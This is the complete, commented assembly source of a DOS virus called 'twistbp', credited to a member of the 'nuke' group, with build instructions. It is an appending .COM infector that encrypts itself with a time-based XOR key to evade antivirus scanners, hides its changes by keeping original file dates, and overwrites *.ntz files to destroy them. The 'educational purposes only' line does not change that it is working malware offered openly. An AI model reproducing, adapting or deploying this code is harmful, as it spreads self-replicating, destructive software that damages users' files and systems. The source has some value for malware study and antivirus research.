; --==twistbp.

asm==--
;
; this program is for eductional purposes only. the author takes no
; responsibilty for any use or misuse of this program. (generic disclaimer)
;
; -appending *.com infector
; -random encrpytion using dos get time funtion
; -preserves original file date and time
; -three infections per run
; -nuke those pesky ntz files off the face of the earth
; -a encryption routine big enought to get 10 signatures
; -unscanable by tbav - ha ha another twist variant?
; -f-prot scans the original virus as a trival variant

; -= thanks to firecracker, memory lapse, viper, talon

; -= qark, and everyone else that responded to my stupid
; -= messages.
; -= a special thanks to all the nuke members
;
; mr. twister, nuke
;
; assemble tasm twistbp
; link with tlink /t twistbp

.model tiny
.radix 16
.code

org 100h

byt equ end_it - ntz_nuke

virus_size equ end_it - start

start: xchg si,si ; just filling space

nop ; infection marker
nop ; infection marker
call loc_1 ; do the call to push called location
loc_1: pop bp ; onto the stack then pop into bp
sub bp,107 ; sub 107 to get back to -0-
call decr ; on the first run the encrypt value
; is -0- so no change on subsquent
; runs the random value is stored into
; enc_val so file is decrypted

jmp where ; this is the actual virus

what: call enc ; encrypt the main part of the virus

mov ah,40 ; write file

mov cx,virus_size ; write the virus size
lea dx,[bp+offset start] ; load the offset of the
; virus into dx
int 21 ; dos function
inc [bp+counter] ; got one increase the counter
jmp $+2 ; thanks screaming
call decr ; decrypt the virus so we can continue
 ret ; return back to the main body

nop ; marker
nop ; marker
nop ; marker
enc_val db 0 ; this is the value that we will
counter db 0 ; encrypt with, its zero to start
nop ; then changes on subquent infections
nop ; marker
enc: mov ah,2c ; dos get time function
int 21 ; dos does it
mov [bp+enc_val],cl ; move the minute into the encryption
; value, this allows for 59 variations
decr: mov cx,byt ; byt is the number of bytes to xor
lea si,[bp+offset ntz_nuke] ; point si at the start of the actual
; virus
dec_lp: lea di,[bp+offset buff] ; point di at the buffer
movsb ; move the byte at si into the buffer
mov al,[bp+offset buff] ; move the buffer into al
xor al,[bp+enc_val] ; xor the al with the enc_val
mov [bp+offset buff],al ; move the byte back into the buffer
lea di,[si-1] ; point di back to where the byte came
from
lea si,[bp+offset buff] ; point si at the buffer
movsb ; mov si to di buffer back into the virus
mov si,di ; movsb increments after each use
loop dec_lp ; loop x number of times x=byt
ret ; done with this function bail

ntz_nuke:
mov ah,4e ; find the first match
get_ntz:
lea dx,[bp+offset ntzmask] ; load the offset filemask dx
int 21 ; dos call
jc do_again ; can't find continue infection
lea dx,[bp+offset end_it+1e]; load the offset fname (?)
mov cl, 7ah ; this loads 7a04 into ax
xchg ah, cl ; shr makes 7a04 into 3d02
mov al, 04h ; ' '
shr ax,1 ; open the file up
int 21 ; dos does it

mov bx,ax ; move file handle into bx

mov ax,4202 ; go to the end of the file
xor cx,cx ; zero these two register or
xor dx,dx ; you'll get very wierd results
int 21 ; thanks dos
mov [bp+how_much],ax ; ax is the file size we want to get
; it all
xor cx,cx ; zero these two register or
xor dx,dx ; you'll get very wierd results
mov ax,4200 ; move back to the front of the file
int 21 ; thanks dos

push cs ; cs and ds are the same

pop ds
lea dx,[bp+new_dta] ; write the information to the file
; from the new dta area
 mov cx,[bp+how_much] ; how much are we going to smear
xor ax,ax
mov ah,40 ; write file function
int 21 ; dos call
mov ah,3e ; close the file
int 21h ; dos call

mov ah,4f ; search for another one

jmp get_ntz ; go back to the start
do_again: ret ; only jumps here when sure no more
; exists

where: lea bx,[bp+offset return_bytes] ; load the address

; of bp plus the original offset
; of return bytes into di.
push ds:[bx] ; push the first two bytes of the
; original program onto the stack
add bx,02 ; increase di to point to the next
; two bytes we saved of the orig prog
push ds:[bx] ; push the last two bytes we saved
; of the original program onto the
; stack

mov ah,1a ; set dta

lea dx,[bp+offset end_it] ; load the effective address
; of the end of the virus to
; be used for the new dta
int 21 ; dos call

call ntz_nuke ; see ya ntz

mov ah,4e ; find the first match

get_f: lea dx,[bp+offset filemask] ; load the offset filemask dx
int 21 ; dos call
jc jp_err ; can't find the file name outahere
jmp getbad ; sloppy jump to get over near
jp_err: jmp exit_error ; jump problem
getbad: mov ah,2f ; get the new dta
int 21 ; this is returned in bx
xor ax,ax ; clear up ax

lea dx,[bp+offset end_it+1e] ; load the offset fname (?)

mov cl, 7ah ; this loads 7a04 into ax
xchg ah, cl ; shr makes 7a04 into 3d02
mov al, 04h ; ' '
shr ax,1 ; open the file up
int 21

;mov ax,3d02 ; open file function - read/write

;int 21 ; dos call

xchg bx,ax ; move the file handle into bx

 mov ax,5700 ; get the files original date
int 21 ; and time and move this
mov [bp+date],dx ; value to date/ time
mov [bp+time],cx ; move cd into buffer

lea di,[bp+offset end_it+1a] ; load the offset fsize (?)

mov ax,word ptr ds:[di] ; move this fsize into ax
sub ax,3 ; take off three to build jmp
mov word ptr [bp+jump_address+1],ax ; save these bytes
; at jump address+1 which is
; jmp (xx xx+3) or 0e9 xx xx

mov ah,3f ; read file

mov cx,4 ; read 4 bytes
lea dx,[bp+offset return_bytes] ; load the offset dx
int 21 ; dos call
lea di,[bp+offset return_bytes+3] ; load the offset of
; the fourth byte
; we just read into
; the virus
cmp byte ptr ds:[di],90 ; is this byte a nop?
je nxtvic ; if so assume infected,
; close file, and run
; infection cycle again

mov ax,4200 ; goto beginning of file

xor cx,cx ; cx must be 0
xor dx,dx ; dx must be 0
int 21 ; dos call

mov ah,40 ; write file

mov cx,4 ; write four bytes
lea dx,[bp+offset jump_address] ; load the offset of
; the bytes to write
; (which is our jmp constuction)
int 21 ; dos call
mov ax,4202 ; goto end of file
xor cx,cx ; cx must be 0
xor dx,dx ; dx must be 0
int 21 ; dos call
call what ; this is the actual part tha writes
jmp $+2 ; thanks again screaming
exit_n: mov cx,[bp+time] ; write the original date
mov dx,[bp+date] ; back to the infected file
mov ax,5701 ; dos write date function
int 21 ; dos call
mov ah,3e ; close the file, the
; infection is complete
int 21 ; dos call
cmp [bp+counter],03 ; how many files do you want to infect?
je exit_error
nxtvic: mov ah,4f ; continue the infection
; process. find the next match!
jmp get_f ; doit again, and stop only
; when int 21 ah=4f reports
; no more matches!
exit_error: cli ; clear interupts
mov ah,1a ; set dta
mov dx,80 ; change to original dta
int 21 ; dos call
mov bx,102 ; set bx to 102
pop [bx] ; pop the last two saved
; bytes into ds:[102]
dec bx ; decrease bx so that is
dec bx ; points to 100
pop [bx] ; pop the first two saved
; bytes into ds:[100]
push bx ; bx=100
xor ax,ax ; most viruses don't do this
xor bx,bx ; sequence, but since some
xor cx,cx ; programs assume the reg's
xor dx,dx ; are set to 0 like they
xor bp,bp ; should be, this is an
xor si,si ; extra precaution.
xor di,di
ret ; return to host
ntzmask db '*.ntz',0
buff db ?
date dw ?
time dw ?
filemask db '*m.com',0 ; look for *.com's
jump_address db 0e9,0,0,90 ; jmp xx xx+3, and 90 is the
new_dta dw ? ; infection marker
how_much dw ?
return_bytes db 0cdh,20,0,0 ; simple way to end the
; first generation (it's
end_it: ; the same as saying int 20)

end start
end code